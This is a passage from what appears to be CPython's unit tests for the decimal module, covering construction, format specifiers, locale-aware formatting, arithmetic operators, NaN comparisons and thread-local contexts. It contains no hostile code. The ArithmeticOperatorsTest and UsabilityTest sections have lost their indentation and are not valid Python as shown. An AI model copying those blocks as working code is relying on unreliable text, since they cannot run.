        for v in [-2**63-1, -2**63, -2**31-1, -2**31, 0,
                  2**31-1, 2**31, 2**63-1, 2**63]:
            d = nc.create_decimal(v)
            self.assertTrue(isinstance(d, Decimal))
            self.assertEqual(int(d), v)

        nc.prec = 3
        nc.traps[Rounded] = True
        self.assertRaises(Rounded, nc.create_decimal, 1234)

        # from string
        nc.prec = 28
        self.assertEqual(str(nc.create_decimal('0E-017')), '0E-17')
        self.assertEqual(str(nc.create_decimal('45')), '45')
        self.assertEqual(str(nc.create_decimal('-Inf')), '-Infinity')
        self.assertEqual(str(nc.create_decimal('NaN123')), 'NaN123')

        # invalid arguments
        self.assertRaises(InvalidOperation, nc.create_decimal, "xyz")
        self.assertRaises(ValueError, nc.create_decimal, (1, "xyz", -25))
        self.assertRaises(TypeError, nc.create_decimal, "1234", "5678")

        # no whitespace and underscore stripping is done with this method
        self.assertRaises(InvalidOperation, nc.create_decimal, " 1234")
        self.assertRaises(InvalidOperation, nc.create_decimal, "12_34")

        # too many NaN payload digits
        nc.prec = 3
        self.assertRaises(InvalidOperation, nc.create_decimal, 'NaN12345')
        self.assertRaises(InvalidOperation, nc.create_decimal,
                          Decimal('NaN12345'))

        nc.traps[InvalidOperation] = False
        self.assertEqual(str(nc.create_decimal('NaN12345')), 'NaN')
        self.assertTrue(nc.flags[InvalidOperation])

        nc.flags[InvalidOperation] = False
        self.assertEqual(str(nc.create_decimal(Decimal('NaN12345'))), 'NaN')
        self.assertTrue(nc.flags[InvalidOperation])

    def test_explicit_context_create_from_float(self):

        Decimal = self.decimal.Decimal

        nc = self.decimal.Context()
        r = nc.create_decimal(0.1)
        self.assertEqual(type(r), Decimal)
        self.assertEqual(str(r), '0.1000000000000000055511151231')
        self.assertTrue(nc.create_decimal(float('nan')).is_qnan())
        self.assertTrue(nc.create_decimal(float('inf')).is_infinite())
        self.assertTrue(nc.create_decimal(float('-inf')).is_infinite())
        self.assertEqual(str(nc.create_decimal(float('nan'))),
                         str(nc.create_decimal('NaN')))
        self.assertEqual(str(nc.create_decimal(float('inf'))),
                         str(nc.create_decimal('Infinity')))
        self.assertEqual(str(nc.create_decimal(float('-inf'))),
                         str(nc.create_decimal('-Infinity')))
        self.assertEqual(str(nc.create_decimal(float('-0.0'))),
                         str(nc.create_decimal('-0')))
        nc.prec = 100
        for i in range(200):
            x = random.expovariate(0.01) * (random.random() * 2.0 - 1.0)
            self.assertEqual(x, float(nc.create_decimal(x))) # roundtrip

    def test_unicode_digits(self):
        Decimal = self.decimal.Decimal

        # Non-ASCII decimal digits (fullwidth, Arabic-Indic, Telugu)
        # are accepted by the constructor.
        test_values = {
            '\uff11': '1',
            '\u0660.\u0660\u0663\u0667\u0662e-\u0663' : '0.0000372',
            '-nan\u0c68\u0c6a\u0c66\u0c66' : '-NaN2400',
            }
        for input, expected in test_values.items():
            self.assertEqual(str(Decimal(input)), expected)
class CExplicitConstructionTest(ExplicitConstructionTest):
    # Run the explicit-construction tests against the C implementation.
    decimal = C
class PyExplicitConstructionTest(ExplicitConstructionTest):
    # Run the explicit-construction tests against the pure-Python implementation.
    decimal = P
class ImplicitConstructionTest(unittest.TestCase):
    '''Unit tests for Implicit Construction cases of Decimal.'''

    def test_implicit_from_None(self):
        Decimal = self.decimal.Decimal
        self.assertRaises(TypeError, eval, 'Decimal(5) + None', locals())

    def test_implicit_from_int(self):
        Decimal = self.decimal.Decimal

        #normal
        self.assertEqual(str(Decimal(5) + 45), '50')
        #exceeding precision
        self.assertEqual(Decimal(5) + 123456789000, Decimal(123456789000))

    def test_implicit_from_string(self):
        Decimal = self.decimal.Decimal
        self.assertRaises(TypeError, eval, 'Decimal(5) + "3"', locals())

    def test_implicit_from_float(self):
        Decimal = self.decimal.Decimal
        self.assertRaises(TypeError, eval, 'Decimal(5) + 2.2', locals())

    def test_implicit_from_Decimal(self):
        Decimal = self.decimal.Decimal
        self.assertEqual(Decimal(5) + Decimal(45), Decimal(50))

    def test_rop(self):
        Decimal = self.decimal.Decimal

        # Allow other classes to be trained to interact with Decimals
        class E:
            def __divmod__(self, other):
                return 'divmod ' + str(other)
            def __rdivmod__(self, other):
                return str(other) + ' rdivmod'
            def __lt__(self, other):
                return 'lt ' + str(other)
            def __gt__(self, other):
                return 'gt ' + str(other)
            def __le__(self, other):
                return 'le ' + str(other)
            def __ge__(self, other):
                return 'ge ' + str(other)
            def __eq__(self, other):
                return 'eq ' + str(other)
            def __ne__(self, other):
                return 'ne ' + str(other)

        # Decimal must defer to E's reflected methods (the comparisons
        # come back mirrored: '<' dispatches to E.__gt__, etc.).
        self.assertEqual(divmod(E(), Decimal(10)), 'divmod 10')
        self.assertEqual(divmod(Decimal(10), E()), '10 rdivmod')
        self.assertEqual(eval('Decimal(10) < E()'), 'gt 10')
        self.assertEqual(eval('Decimal(10) > E()'), 'lt 10')
        self.assertEqual(eval('Decimal(10) <= E()'), 'ge 10')
        self.assertEqual(eval('Decimal(10) >= E()'), 'le 10')
        self.assertEqual(eval('Decimal(10) == E()'), 'eq 10')
        self.assertEqual(eval('Decimal(10) != E()'), 'ne 10')

        # insert operator methods and then exercise them
        oplist = [
            ('+', '__add__', '__radd__'),
            ('-', '__sub__', '__rsub__'),
            ('*', '__mul__', '__rmul__'),
            ('/', '__truediv__', '__rtruediv__'),
            ('%', '__mod__', '__rmod__'),
            ('//', '__floordiv__', '__rfloordiv__'),
            ('**', '__pow__', '__rpow__')
        ]

        for sym, lop, rop in oplist:
            # NOTE: the lambdas close over lop/rop late, but each pair is
            # exercised immediately within the same iteration, so the
            # current values are always the ones observed.
            setattr(E, lop, lambda self, other: 'str' + lop + str(other))
            setattr(E, rop, lambda self, other: str(other) + rop + 'str')
            self.assertEqual(eval('E()' + sym + 'Decimal(10)'),
                             'str' + lop + '10')
            self.assertEqual(eval('Decimal(10)' + sym + 'E()'),
                             '10' + rop + 'str')
class CImplicitConstructionTest(ImplicitConstructionTest):
    # Run the implicit-construction tests against the C implementation.
    decimal = C
class PyImplicitConstructionTest(ImplicitConstructionTest):
    # Run the implicit-construction tests against the pure-Python implementation.
    decimal = P
class FormatTest(unittest.TestCase):
    '''Unit tests for the format function.'''

    def test_formatting(self):
        # Exercise format(Decimal, spec) across presentation types
        # ('e', 'f', 'g', '%', 'n'), alignment/fill, sign handling,
        # zero padding and thousands separators.
        Decimal = self.decimal.Decimal

        # triples giving a format, a Decimal, and the expected result
        test_values = [
            ('e', '0E-15', '0e-15'),
            ('e', '2.3E-15', '2.3e-15'),
            ('e', '2.30E+2', '2.30e+2'), # preserve significant zeros
            ('e', '2.30000E-15', '2.30000e-15'),
            ('e', '1.23456789123456789e40', '1.23456789123456789e+40'),
            ('e', '1.5', '1.5e+0'),
            ('e', '0.15', '1.5e-1'),
            ('e', '0.015', '1.5e-2'),
            ('e', '0.0000000000015', '1.5e-12'),
            ('e', '15.0', '1.50e+1'),
            ('e', '-15', '-1.5e+1'),
            ('e', '0', '0e+0'),
            ('e', '0E1', '0e+1'),
            ('e', '0.0', '0e-1'),
            ('e', '0.00', '0e-2'),
            ('.6e', '0E-15', '0.000000e-9'),
            ('.6e', '0', '0.000000e+6'),
            ('.6e', '9.999999', '9.999999e+0'),
            ('.6e', '9.9999999', '1.000000e+1'),
            ('.6e', '-1.23e5', '-1.230000e+5'),
            ('.6e', '1.23456789e-3', '1.234568e-3'),
            ('f', '0', '0'),
            ('f', '0.0', '0.0'),
            ('f', '0E-2', '0.00'),
            ('f', '0.00E-8', '0.0000000000'),
            ('f', '0E1', '0'), # loses exponent information
            ('f', '3.2E1', '32'),
            ('f', '3.2E2', '320'),
            ('f', '3.20E2', '320'),
            ('f', '3.200E2', '320.0'),
            ('f', '3.2E-6', '0.0000032'),
            ('.6f', '0E-15', '0.000000'), # all zeros treated equally
            ('.6f', '0E1', '0.000000'),
            ('.6f', '0', '0.000000'),
            ('.0f', '0', '0'), # no decimal point
            ('.0f', '0e-2', '0'),
            ('.0f', '3.14159265', '3'),
            ('.1f', '3.14159265', '3.1'),
            ('.4f', '3.14159265', '3.1416'),
            ('.6f', '3.14159265', '3.141593'),
            ('.7f', '3.14159265', '3.1415926'), # round-half-even!
            ('.8f', '3.14159265', '3.14159265'),
            ('.9f', '3.14159265', '3.141592650'),
            ('g', '0', '0'),
            ('g', '0.0', '0.0'),
            ('g', '0E1', '0e+1'),
            ('G', '0E1', '0E+1'),
            ('g', '0E-5', '0.00000'),
            ('g', '0E-6', '0.000000'),
            ('g', '0E-7', '0e-7'),
            ('g', '-0E2', '-0e+2'),
            ('.0g', '3.14159265', '3'), # 0 sig fig -> 1 sig fig
            ('.0n', '3.14159265', '3'), # same for 'n'
            ('.1g', '3.14159265', '3'),
            ('.2g', '3.14159265', '3.1'),
            ('.5g', '3.14159265', '3.1416'),
            ('.7g', '3.14159265', '3.141593'),
            ('.8g', '3.14159265', '3.1415926'), # round-half-even!
            ('.9g', '3.14159265', '3.14159265'),
            ('.10g', '3.14159265', '3.14159265'), # don't pad
            ('%', '0E1', '0%'),
            ('%', '0E0', '0%'),
            ('%', '0E-1', '0%'),
            ('%', '0E-2', '0%'),
            ('%', '0E-3', '0.0%'),
            ('%', '0E-4', '0.00%'),
            ('.3%', '0', '0.000%'), # all zeros treated equally
            ('.3%', '0E10', '0.000%'),
            ('.3%', '0E-10', '0.000%'),
            ('.3%', '2.34', '234.000%'),
            ('.3%', '1.234567', '123.457%'),
            ('.0%', '1.23', '123%'),
            ('e', 'NaN', 'NaN'),
            ('f', '-NaN123', '-NaN123'),
            ('+g', 'NaN456', '+NaN456'),
            ('.3e', 'Inf', 'Infinity'),
            ('.16f', '-Inf', '-Infinity'),
            ('.0g', '-sNaN', '-sNaN'),

            ('', '1.00', '1.00'),

            # test alignment and padding
            ('6', '123', '   123'),
            ('<6', '123', '123   '),
            ('>6', '123', '   123'),
            ('^6', '123', ' 123  '),
            ('=+6', '123', '+  123'),
            ('#<10', 'NaN', 'NaN#######'),
            ('#<10', '-4.3', '-4.3######'),
            ('#<+10', '0.0130', '+0.0130###'),
            ('#< 10', '0.0130', ' 0.0130###'),
            ('@>10', '-Inf', '@-Infinity'),
            ('#>5', '-Inf', '-Infinity'),
            ('?^5', '123', '?123?'),
            ('%^6', '123', '%123%%'),
            (' ^6', '-45.6', '-45.6 '),
            ('/=10', '-45.6', '-/////45.6'),
            ('/=+10', '45.6', '+/////45.6'),
            ('/= 10', '45.6', ' /////45.6'),
            ('\x00=10', '-inf', '-\x00Infinity'),
            ('\x00^16', '-inf', '\x00\x00\x00-Infinity\x00\x00\x00\x00'),
            ('\x00>10', '1.2345', '\x00\x00\x00\x001.2345'),
            ('\x00<10', '1.2345', '1.2345\x00\x00\x00\x00'),

            # thousands separator
            (',', '1234567', '1,234,567'),
            (',', '123456', '123,456'),
            (',', '12345', '12,345'),
            (',', '1234', '1,234'),
            (',', '123', '123'),
            (',', '12', '12'),
            (',', '1', '1'),
            (',', '0', '0'),
            (',', '-1234567', '-1,234,567'),
            (',', '-123456', '-123,456'),
            ('7,', '123456', '123,456'),
            ('8,', '123456', ' 123,456'),
            ('08,', '123456', '0,123,456'), # special case: extra 0 needed
            ('+08,', '123456', '+123,456'), # but not if there's a sign
            (' 08,', '123456', ' 123,456'),
            ('08,', '-123456', '-123,456'),
            ('+09,', '123456', '+0,123,456'),
            # ... with fractional part...
            ('07,', '1234.56', '1,234.56'),
            ('08,', '1234.56', '1,234.56'),
            ('09,', '1234.56', '01,234.56'),
            ('010,', '1234.56', '001,234.56'),
            ('011,', '1234.56', '0,001,234.56'),
            ('012,', '1234.56', '0,001,234.56'),
            ('08,.1f', '1234.5', '01,234.5'),
            # no thousands separators in fraction part
            (',', '1.23456789', '1.23456789'),
            (',%', '123.456789', '12,345.6789%'),
            (',e', '123456', '1.23456e+5'),
            (',E', '123456', '1.23456E+5'),

            # issue 6850
            ('a=-7.0', '0.12345', 'aaaa0.1'),

            # issue 22090
            ('<^+15.20%', 'inf', '<<+Infinity%<<<'),
            ('\x07>,%', 'sNaN1234567', 'sNaN1234567%'),
            ('=10.10%', 'NaN123', '   NaN123%'),
        ]
        for fmt, d, result in test_values:
            self.assertEqual(format(Decimal(d), fmt), result)

        # bytes format argument
        self.assertRaises(TypeError, Decimal(1).__format__, b'-020')

    def test_n_format(self):
        # 'n' formatting with injected localeconv-style dictionaries.
        # The C implementation takes the override as a positional second
        # argument to __format__; the Python one uses the private
        # _localeconv keyword.
        Decimal = self.decimal.Decimal
        try:
            from locale import CHAR_MAX
        except ImportError:
            self.skipTest('locale.CHAR_MAX not available')

        def make_grouping(lst):
            # C expects the grouping as a bytes-like string of code points,
            # the Python version takes the list directly.
            return ''.join([chr(x) for x in lst]) if self.decimal == C else lst

        def get_fmt(x, override=None, fmt='n'):
            if self.decimal == C:
                return Decimal(x).__format__(fmt, override)
            else:
                return Decimal(x).__format__(fmt, _localeconv=override)

        # Set up some localeconv-like dictionaries
        en_US = {
            'decimal_point' : '.',
            'grouping' : make_grouping([3, 3, 0]),
            'thousands_sep' : ','
        }

        fr_FR = {
            'decimal_point' : ',',
            'grouping' : make_grouping([CHAR_MAX]),
            'thousands_sep' : ''
        }

        ru_RU = {
            'decimal_point' : ',',
            'grouping': make_grouping([3, 3, 0]),
            'thousands_sep' : ' '
        }

        crazy = {
            'decimal_point' : '&',
            'grouping': make_grouping([1, 4, 2, CHAR_MAX]),
            'thousands_sep' : '-'
        }

        dotsep_wide = {
            'decimal_point' : b'\xc2\xbf'.decode('utf-8'),
            'grouping': make_grouping([3, 3, 0]),
            'thousands_sep' : b'\xc2\xb4'.decode('utf-8')
        }

        self.assertEqual(get_fmt(Decimal('12.7'), en_US), '12.7')
        self.assertEqual(get_fmt(Decimal('12.7'), fr_FR), '12,7')
        self.assertEqual(get_fmt(Decimal('12.7'), ru_RU), '12,7')
        self.assertEqual(get_fmt(Decimal('12.7'), crazy), '1-2&7')

        self.assertEqual(get_fmt(123456789, en_US), '123,456,789')
        self.assertEqual(get_fmt(123456789, fr_FR), '123456789')
        self.assertEqual(get_fmt(123456789, ru_RU), '123 456 789')
        self.assertEqual(get_fmt(1234567890123, crazy), '123456-78-9012-3')

        self.assertEqual(get_fmt(123456789, en_US, '.6n'), '1.23457e+8')
        self.assertEqual(get_fmt(123456789, fr_FR, '.6n'), '1,23457e+8')
        self.assertEqual(get_fmt(123456789, ru_RU, '.6n'), '1,23457e+8')
        self.assertEqual(get_fmt(123456789, crazy, '.6n'), '1&23457e+8')

        # zero padding
        self.assertEqual(get_fmt(1234, fr_FR, '03n'), '1234')
        self.assertEqual(get_fmt(1234, fr_FR, '04n'), '1234')
        self.assertEqual(get_fmt(1234, fr_FR, '05n'), '01234')
        self.assertEqual(get_fmt(1234, fr_FR, '06n'), '001234')

        self.assertEqual(get_fmt(12345, en_US, '05n'), '12,345')
        self.assertEqual(get_fmt(12345, en_US, '06n'), '12,345')
        self.assertEqual(get_fmt(12345, en_US, '07n'), '012,345')
        self.assertEqual(get_fmt(12345, en_US, '08n'), '0,012,345')
        self.assertEqual(get_fmt(12345, en_US, '09n'), '0,012,345')
        self.assertEqual(get_fmt(12345, en_US, '010n'), '00,012,345')

        self.assertEqual(get_fmt(123456, crazy, '06n'), '1-2345-6')
        self.assertEqual(get_fmt(123456, crazy, '07n'), '1-2345-6')
        self.assertEqual(get_fmt(123456, crazy, '08n'), '1-2345-6')
        self.assertEqual(get_fmt(123456, crazy, '09n'), '01-2345-6')
        self.assertEqual(get_fmt(123456, crazy, '010n'), '0-01-2345-6')
        self.assertEqual(get_fmt(123456, crazy, '011n'), '0-01-2345-6')
        self.assertEqual(get_fmt(123456, crazy, '012n'), '00-01-2345-6')
        self.assertEqual(get_fmt(123456, crazy, '013n'), '000-01-2345-6')

        # wide char separator and decimal point
        self.assertEqual(get_fmt(Decimal('-1.5'), dotsep_wide, '020n'),
                         '-0\u00b4000\u00b4000\u00b4000\u00b4001\u00bf5')

    @run_with_locale('LC_ALL', 'ps_AF')
    def test_wide_char_separator_decimal_point(self):
        # locale with wide char separator and decimal point
        import locale
        Decimal = self.decimal.Decimal

        decimal_point = locale.localeconv()['decimal_point']
        thousands_sep = locale.localeconv()['thousands_sep']
        if decimal_point != '\u066b':
            self.skipTest('inappropriate decimal point separator'
                          '({!a} not {!a})'.format(decimal_point, '\u066b'))
        if thousands_sep != '\u066c':
            self.skipTest('inappropriate thousands separator'
                          '({!a} not {!a})'.format(thousands_sep, '\u066c'))

        self.assertEqual(format(Decimal('100000000.123'), 'n'),
                         '100\u066c000\u066c000\u066b123')
class CFormatTest(FormatTest):
    # Run FormatTest against the C implementation.
    decimal = C
class PyFormatTest(FormatTest):
    # Run FormatTest against the pure-Python implementation.
    decimal = P
class ArithmeticOperatorsTest(unittest.TestCase):
'''Unit tests for all arithmetic operators, binary and unary.'''
def test_addition(self):
Decimal = self.decimal.Decimal
d1 = Decimal('-11.1')
d2 = Decimal('22.2')
#two Decimals
self.assertEqual(d1+d2, Decimal('11.1'))
self.assertEqual(d2+d1, Decimal('11.1'))
#with other type, left
c = d1 + 5
self.assertEqual(c, Decimal('-6.1'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 5 + d1
self.assertEqual(c, Decimal('-6.1'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 += d2
self.assertEqual(d1, Decimal('11.1'))
#inline with other type
d1 += 5
self.assertEqual(d1, Decimal('16.1'))
def test_subtraction(self):
Decimal = self.decimal.Decimal
d1 = Decimal('-11.1')
d2 = Decimal('22.2')
#two Decimals
self.assertEqual(d1-d2, Decimal('-33.3'))
self.assertEqual(d2-d1, Decimal('33.3'))
#with other type, left
c = d1 - 5
self.assertEqual(c, Decimal('-16.1'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 5 - d1
self.assertEqual(c, Decimal('16.1'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 -= d2
self.assertEqual(d1, Decimal('-33.3'))
#inline with other type
d1 -= 5
self.assertEqual(d1, Decimal('-38.3'))
def test_multiplication(self):
Decimal = self.decimal.Decimal
d1 = Decimal('-5')
d2 = Decimal('3')
#two Decimals
self.assertEqual(d1*d2, Decimal('-15'))
self.assertEqual(d2*d1, Decimal('-15'))
#with other type, left
c = d1 * 5
self.assertEqual(c, Decimal('-25'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 5 * d1
self.assertEqual(c, Decimal('-25'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 *= d2
self.assertEqual(d1, Decimal('-15'))
#inline with other type
d1 *= 5
self.assertEqual(d1, Decimal('-75'))
def test_division(self):
Decimal = self.decimal.Decimal
d1 = Decimal('-5')
d2 = Decimal('2')
#two Decimals
self.assertEqual(d1/d2, Decimal('-2.5'))
self.assertEqual(d2/d1, Decimal('-0.4'))
#with other type, left
c = d1 / 4
self.assertEqual(c, Decimal('-1.25'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 4 / d1
self.assertEqual(c, Decimal('-0.8'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 /= d2
self.assertEqual(d1, Decimal('-2.5'))
#inline with other type
d1 /= 4
self.assertEqual(d1, Decimal('-0.625'))
def test_floor_division(self):
Decimal = self.decimal.Decimal
d1 = Decimal('5')
d2 = Decimal('2')
#two Decimals
self.assertEqual(d1//d2, Decimal('2'))
self.assertEqual(d2//d1, Decimal('0'))
#with other type, left
c = d1 // 4
self.assertEqual(c, Decimal('1'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 7 // d1
self.assertEqual(c, Decimal('1'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 //= d2
self.assertEqual(d1, Decimal('2'))
#inline with other type
d1 //= 2
self.assertEqual(d1, Decimal('1'))
def test_powering(self):
Decimal = self.decimal.Decimal
d1 = Decimal('5')
d2 = Decimal('2')
#two Decimals
self.assertEqual(d1**d2, Decimal('25'))
self.assertEqual(d2**d1, Decimal('32'))
#with other type, left
c = d1 ** 4
self.assertEqual(c, Decimal('625'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 7 ** d1
self.assertEqual(c, Decimal('16807'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 **= d2
self.assertEqual(d1, Decimal('25'))
#inline with other type
d1 **= 4
self.assertEqual(d1, Decimal('390625'))
def test_module(self):
Decimal = self.decimal.Decimal
d1 = Decimal('5')
d2 = Decimal('2')
#two Decimals
self.assertEqual(d1%d2, Decimal('1'))
self.assertEqual(d2%d1, Decimal('2'))
#with other type, left
c = d1 % 4
self.assertEqual(c, Decimal('1'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 7 % d1
self.assertEqual(c, Decimal('2'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 %= d2
self.assertEqual(d1, Decimal('1'))
#inline with other type
d1 %= 4
self.assertEqual(d1, Decimal('1'))
def test_floor_div_module(self):
Decimal = self.decimal.Decimal
d1 = Decimal('5')
d2 = Decimal('2')
#two Decimals
(p, q) = divmod(d1, d2)
self.assertEqual(p, Decimal('2'))
self.assertEqual(q, Decimal('1'))
self.assertEqual(type(p), type(d1))
self.assertEqual(type(q), type(d1))
#with other type, left
(p, q) = divmod(d1, 4)
self.assertEqual(p, Decimal('1'))
self.assertEqual(q, Decimal('1'))
self.assertEqual(type(p), type(d1))
self.assertEqual(type(q), type(d1))
#with other type, right
(p, q) = divmod(7, d1)
self.assertEqual(p, Decimal('1'))
self.assertEqual(q, Decimal('2'))
self.assertEqual(type(p), type(d1))
self.assertEqual(type(q), type(d1))
def test_unary_operators(self):
Decimal = self.decimal.Decimal
self.assertEqual(+Decimal(45), Decimal(+45)) # +
self.assertEqual(-Decimal(45), Decimal(-45)) # -
self.assertEqual(abs(Decimal(45)), abs(Decimal(-45))) # abs
def test_nan_comparisons(self):
# comparisons involving signaling nans signal InvalidOperation
# order comparisons (<, <=, >, >=) involving only quiet nans
# also signal InvalidOperation
# equality comparisons (==, !=) involving only quiet nans
# don't signal, but return False or True respectively.
Decimal = self.decimal.Decimal
InvalidOperation = self.decimal.InvalidOperation
localcontext = self.decimal.localcontext
n = Decimal('NaN')
s = Decimal('sNaN')
i = Decimal('Inf')
f = Decimal('2')
qnan_pairs = (n, n), (n, i), (i, n), (n, f), (f, n)
snan_pairs = (s, n), (n, s), (s, i), (i, s), (s, f), (f, s), (s, s)
order_ops = operator.lt, operator.le, operator.gt, operator.ge
equality_ops = operator.eq, operator.ne
# results when InvalidOperation is not trapped
for x, y in qnan_pairs + snan_pairs:
for op in order_ops + equality_ops:
got = op(x, y)
expected = True if op is operator.ne else False
self.assertIs(expected, got,
"expected {0!r} for operator.{1}({2!r}, {3!r}); "
"got {4!r}".format(
expected, op.__name__, x, y, got))
# repeat the above, but this time trap the InvalidOperation
with localcontext() as ctx:
ctx.traps[InvalidOperation] = 1
for x, y in qnan_pairs:
for op in equality_ops:
got = op(x, y)
expected = True if op is operator.ne else False
self.assertIs(expected, got,
"expected {0!r} for "
"operator.{1}({2!r}, {3!r}); "
"got {4!r}".format(
expected, op.__name__, x, y, got))
for x, y in snan_pairs:
for op in equality_ops:
self.assertRaises(InvalidOperation, operator.eq, x, y)
self.assertRaises(InvalidOperation, operator.ne, x, y)
for x, y in qnan_pairs + snan_pairs:
for op in order_ops:
self.assertRaises(InvalidOperation, op, x, y)
def test_copy_sign(self):
Decimal = self.decimal.Decimal
d = Decimal(1).copy_sign(Decimal(-2))
self.assertEqual(Decimal(1).copy_sign(-2), d)
self.assertRaises(TypeError, Decimal(1).copy_sign, '-2')
class CArithmeticOperatorsTest(ArithmeticOperatorsTest):
    # Run ArithmeticOperatorsTest against the C implementation.
    decimal = C
class PyArithmeticOperatorsTest(ArithmeticOperatorsTest):
    # Run ArithmeticOperatorsTest against the pure-Python implementation.
    decimal = P
# The following are two functions used to test threading in the next class
def thfunc1(cls):
    """Thread body used by ThreadingTest.test_threading.

    *cls* is the ThreadingTest instance, providing the assert* methods
    and the synchro/finish1/finish2 events shared with thfunc2.  This
    thread verifies that flag/trap changes made in thfunc2's thread-local
    context never become visible here.
    """
    Decimal = cls.decimal.Decimal
    InvalidOperation = cls.decimal.InvalidOperation
    DivisionByZero = cls.decimal.DivisionByZero
    Overflow = cls.decimal.Overflow
    Underflow = cls.decimal.Underflow
    Inexact = cls.decimal.Inexact
    getcontext = cls.decimal.getcontext
    localcontext = cls.decimal.localcontext

    d1 = Decimal(1)
    d3 = Decimal(3)
    test1 = d1/d3

    cls.finish1.set()
    # Wait for thfunc2 to change its own thread's context (prec = 18);
    # the division below must be unaffected by that change.
    cls.synchro.wait()

    test2 = d1/d3
    # localcontext() copies the current context including its flags;
    # flags raised inside nested contexts must not propagate outward.
    with localcontext() as c2:
        cls.assertTrue(c2.flags[Inexact])
        cls.assertRaises(DivisionByZero, c2.divide, d1, 0)
        cls.assertTrue(c2.flags[DivisionByZero])
        with localcontext() as c3:
            cls.assertTrue(c3.flags[Inexact])
            cls.assertTrue(c3.flags[DivisionByZero])
            cls.assertRaises(InvalidOperation, c3.compare, d1, Decimal('sNaN'))
            cls.assertTrue(c3.flags[InvalidOperation])
            del c3
        cls.assertFalse(c2.flags[InvalidOperation])
        del c2

    # Both divisions used this thread's 24-digit precision (set on
    # DefaultContext by test_threading), before and after thfunc2's change.
    cls.assertEqual(test1, Decimal('0.333333333333333333333333'))
    cls.assertEqual(test2, Decimal('0.333333333333333333333333'))

    c1 = getcontext()
    cls.assertTrue(c1.flags[Inexact])
    for sig in Overflow, Underflow, DivisionByZero, InvalidOperation:
        cls.assertFalse(c1.flags[sig])
def thfunc2(cls):
    """Second thread body used by ThreadingTest.test_threading.

    Changes this thread's context precision mid-test and signals thfunc1
    (via cls.synchro) so it can verify the change did not leak across
    threads.  Also checks nested localcontext flag/trap isolation.
    """
    Decimal = cls.decimal.Decimal
    InvalidOperation = cls.decimal.InvalidOperation
    DivisionByZero = cls.decimal.DivisionByZero
    Overflow = cls.decimal.Overflow
    Underflow = cls.decimal.Underflow
    Inexact = cls.decimal.Inexact
    getcontext = cls.decimal.getcontext
    localcontext = cls.decimal.localcontext

    d1 = Decimal(1)
    d3 = Decimal(3)
    test1 = d1/d3

    # Change only this thread's context: precision drops from the
    # DefaultContext's 24 digits to 18.
    thiscontext = getcontext()
    thiscontext.prec = 18
    test2 = d1/d3

    with localcontext() as c2:
        cls.assertTrue(c2.flags[Inexact])
        cls.assertRaises(Overflow, c2.multiply, Decimal('1e425000000'), 999)
        cls.assertTrue(c2.flags[Overflow])
        # Entering localcontext(thiscontext) starts from a copy of
        # thiscontext, so the Overflow flag raised on c2 is absent here.
        with localcontext(thiscontext) as c3:
            cls.assertTrue(c3.flags[Inexact])
            cls.assertFalse(c3.flags[Overflow])
            c3.traps[Underflow] = True
            cls.assertRaises(Underflow, c3.divide, Decimal('1e-425000000'), 999)
            cls.assertTrue(c3.flags[Underflow])
            del c3
        cls.assertFalse(c2.flags[Underflow])
        cls.assertFalse(c2.traps[Underflow])
        del c2

    # Let thfunc1 proceed, then mark this thread as finished.
    cls.synchro.set()
    cls.finish2.set()

    # test1 ran at 24-digit precision, test2 at the reduced 18 digits.
    cls.assertEqual(test1, Decimal('0.333333333333333333333333'))
    cls.assertEqual(test2, Decimal('0.333333333333333333'))

    cls.assertFalse(thiscontext.traps[Underflow])
    cls.assertTrue(thiscontext.flags[Inexact])
    for sig in Overflow, Underflow, DivisionByZero, InvalidOperation:
        cls.assertFalse(thiscontext.flags[sig])
class ThreadingTest(unittest.TestCase):
    '''Unit tests for thread local contexts in Decimal.'''

    # Take care executing this test from IDLE, there's an issue in threading
    # that hangs IDLE and I couldn't find it
    def test_threading(self):
        DefaultContext = self.decimal.DefaultContext

        if self.decimal == C and not self.decimal.HAVE_THREADS:
            self.skipTest("compiled without threading")
        # Test the "threading isolation" of a Context. Also test changing
        # the DefaultContext, which acts as a template for the thread-local
        # contexts.
        save_prec = DefaultContext.prec
        save_emax = DefaultContext.Emax
        save_emin = DefaultContext.Emin
        DefaultContext.prec = 24
        DefaultContext.Emax = 425000000
        DefaultContext.Emin = -425000000

        self.synchro = threading.Event()
        self.finish1 = threading.Event()
        self.finish2 = threading.Event()

        th1 = threading.Thread(target=thfunc1, args=(self,))
        th2 = threading.Thread(target=thfunc2, args=(self,))

        th1.start()
        th2.start()

        self.finish1.wait()
        self.finish2.wait()

        # Flag changes made in the worker threads' contexts must not have
        # leaked into the shared DefaultContext template.
        for sig in Signals[self.decimal]:
            self.assertFalse(DefaultContext.flags[sig])

        th1.join()
        th2.join()

        DefaultContext.prec = save_prec
        DefaultContext.Emax = save_emax
        DefaultContext.Emin = save_emin
@unittest.skipUnless(threading, 'threading required')
class CThreadingTest(ThreadingTest):
    # Run ThreadingTest against the C implementation.
    decimal = C
@unittest.skipUnless(threading, 'threading required')
class PyThreadingTest(ThreadingTest):
    # Run ThreadingTest against the pure-Python implementation.
    decimal = P
class UsabilityTest(unittest.TestCase):
'''Unit tests for Usability cases of Decimal.'''
def test_comparison_operators(self):
Decimal = self.decimal.Decimal
da = Decimal('23.42')
db = Decimal('23.42')
dc = Decimal('45')
#two Decimals
self.assertGreater(dc, da)
self.assertGreaterEqual(dc, da)
self.assertLess(da, dc)
self.assertLessEqual(da, dc)
self.assertEqual(da, db)
self.assertNotEqual(da, dc)
self.assertLessEqual(da, db)
self.assertGreaterEqual(da, db)
#a Decimal and an int
self.assertGreater(dc, 23)
self.assertLess(23, dc)
self.assertEqual(dc, 45)
#a Decimal and uncomparable
self.assertNotEqual(da, 'ugly')
self.assertNotEqual(da, 32.7)
self.assertNotEqual(da, object())
self.assertNotEqual(da, object)
# sortable
a = list(map(Decimal, range(100)))
b = a[:]
random.shuffle(a)
a.sort()
